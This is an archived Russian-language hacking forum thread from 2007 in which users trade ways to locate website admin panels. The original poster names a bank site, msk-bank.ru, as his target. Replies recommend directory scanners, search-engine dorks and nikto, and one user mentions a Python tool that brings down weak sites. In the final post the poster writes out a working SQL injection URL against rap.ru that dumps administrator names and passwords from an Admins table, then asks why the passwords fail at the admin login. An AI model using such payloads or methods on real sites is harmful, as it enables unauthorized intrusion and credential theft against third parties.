ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Вопрос по обнаружению админок на сайте
  #1  
Старый 06.08.2007, 21:37
Termin@L
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме:
492591

Репутация: 123
По умолчанию Вопрос по обнаружению админок на сайте

Народ, подскажите какие есть способы найти админку на сайте, очень интересует, много всего перепробовал...
Есть сайт msk-bank.ru, никак не могу найти
 
Ответить с цитированием

  #2  
Старый 06.08.2007, 21:43
Ni0x
Постоянный
Регистрация: 27.08.2006
Сообщений: 367
Провел на форуме:
2009677

Репутация: 472
По умолчанию

первым делом проверь на robots.txt, затем поскань структуру сайта сканером, можно пройтись поисковиком, ручной подбор также использовать можно.
 
Ответить с цитированием

  #3  
Старый 06.08.2007, 21:47
_-Ramos-_
Banned
Регистрация: 04.01.2007
Сообщений: 193
Провел на форуме:
4213286

Репутация: 728
По умолчанию

главный способ по обнаружению админок это inurl:"site" inurl:"admin"
но по ходу на сайте msk-bank.ru нет админки , мож я ошибаюсь

Последний раз редактировалось RAUL07; 06.08.2007 в 21:52..
 
Ответить с цитированием

  #4  
Старый 07.08.2007, 00:26
Zitt
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
Провел на форуме:
5885100

Репутация: 773


Отправить сообщение для Zitt с помощью ICQ
По умолчанию

Цитата:
админок это inurl:"site" inurl:"admin"
тогда уж лучше inurl:"admin" site:'site'
 
Ответить с цитированием

  #5  
Старый 07.08.2007, 00:31
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

Сканер директорий юзать надо)

Не знаю, что в пабле валяется нормальное, но при наличии хорошей базы-словаря можно найти много чего)
 
Ответить с цитированием

  #6  
Старый 07.08.2007, 02:19
lMCl
Новичок
Регистрация: 04.08.2007
Сообщений: 4
Провел на форуме:
13391

Репутация: 0
По умолчанию

название сканера можно в студию?
 
Ответить с цитированием

  #7  
Старый 07.08.2007, 02:50
Talisman
Постоянный
Регистрация: 22.04.2006
Сообщений: 566
Провел на форуме:
1325772

Репутация: 517


Отправить сообщение для Talisman с помощью ICQ
По умолчанию

Писал вещичку на питоне.. легкие сайты с широких каналов валит

Ps Пробей домены на этом же айпи/хосте, можт у админки адрес другой. врятли бы и другой айпи ей давали
хотя я гемороился пару раз )
 
Ответить с цитированием

  #8  
Старый 07.08.2007, 09:33
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357

Репутация: 3742


Отправить сообщение для blackybr с помощью ICQ Отправить сообщение для blackybr с помощью AIM Отправить сообщение для blackybr с помощью Yahoo
По умолчанию

В избранном на античате есть pelmeshka сканер. вообще их ооочень много. выбирай на вкус. я иногда юзаю nikto
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием

  #9  
Старый 07.08.2007, 09:39
•••™NO FEAR™•••
Постоянный
Регистрация: 08.08.2005
Сообщений: 782
Провел на форуме:
6573706

Репутация: 1419


По умолчанию

http://forum.antichat.ru/thread40031.html
 
Ответить с цитированием

  #10  
Старый 08.08.2007, 01:24
Termin@L
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме:
492591

Репутация: 123
По умолчанию

rap.ru
На данном сайте существует бага, скуль
http://www.rap.ru/page.php?path=/survey&survey_id=-1+union+select+1,2,concat(Nick,char(58),Passwd),4+ from+Admins/*
а также есть админка
http://www.rap.ru/admin

Однако пароли не подходят, поиск других админок ничего не дал, может кто родскажет, что к чему и почему ничего не получается?

P.S. сканирование Nikto дало помимо всего такой результат -
+ /~root - Enumeration of users is possible by requesting ~username (responds with Forbidden for real users, not found for non-existent users) (GET).
Не совсем понимаю, что это значит.

Последний раз редактировалось Termin@L; 08.08.2007 в 01:32..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Proxy FAQ foreva Чужие Статьи 12 04.01.2008 12:15
Ошибки Windows dinar_007 Windows 19 01.07.2007 13:32
ЕсТь ВоПрос Guma Чаты 4 26.10.2005 21:48
ВОПРОС ЗНАТОКАМ Hrust Болталка 12 23.01.2005 19:31
Вопрос к ОТЦАМ!!!!!! Xalegi Болталка 8 22.12.2004 01:36



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ